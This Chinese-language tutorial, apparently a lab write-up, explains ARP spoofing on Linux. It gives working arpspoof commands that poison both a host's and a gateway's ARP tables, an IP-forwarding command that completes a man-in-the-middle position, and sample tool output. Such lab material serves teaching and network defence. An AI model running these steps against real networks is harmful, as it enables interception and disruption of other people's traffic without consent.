LINUX -ARP欺骗

介绍：

由于局域网的网络流通不是根据IP地址进行，而是根据MAC地址进行传输。所以，MAC地址在A上被伪造成一个不存在的MAC地址，这样就会导致网络不通，A不能Ping通C！这就是一个简单的ARP欺骗。

第一种ARP欺骗的原理是——截获网关数据。它通知路由器一 系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址， 造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径 上网。在PC看来，就是上不了网了，“网络掉线了”

测试环境：

操作步骤：

1、在攻击主机B上安装arpspoof，sudo apt-get install dsniff

2、主机B用作ARP攻击欺骗，发起ARP包欺骗主机A网关MAC为客户机B网卡MAC：

arpspoof -t 192.168.2.166 192.168.2.254

18:3:73:43:af:7b b8:ae:ed:96:4c:54 0806 42: arp reply 192.168.2.254 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b b8:ae:ed:96:4c:54 0806 42: arp reply 192.168.2.254 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b b8:ae:ed:96:4c:54 0806 42: arp reply 192.168.2.254 is-at 18:3:73:43:af:7b

3、主机B欺骗网关主机A的MAC地址为主机B的MAC地址

arpspoof -t  192.168.2.254 192.168.2.166

18:3:73:43:af:7b 1c:df:f:b7:19:7f 0806 42: arp reply 192.168.2.166 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b 1c:df:f:b7:19:7f 0806 42: arp reply 192.168.2.166 is-at 18:3:73:43:af:7b
18:3:73:43:af:7b 1c:df:f:b7:19:7f 0806 42: arp reply 192.168.2.166 is-at 18:3:73:43:af:7b

4、主机B开启数据包转发功能

echo 1 >/proc/sys/net/ipv4/ip_forward

 

预期结果：

网关tracert 主机A(需要先安装软件包  intsall traceroute )

traceroute 192.168.2.166

traceroute to 192.168.2.166 (192.168.2.166), 30 hops max, 60 byte packets
 1  cdos.local (192.168.2.166)  0.348 ms  0.317 ms  0.306 ms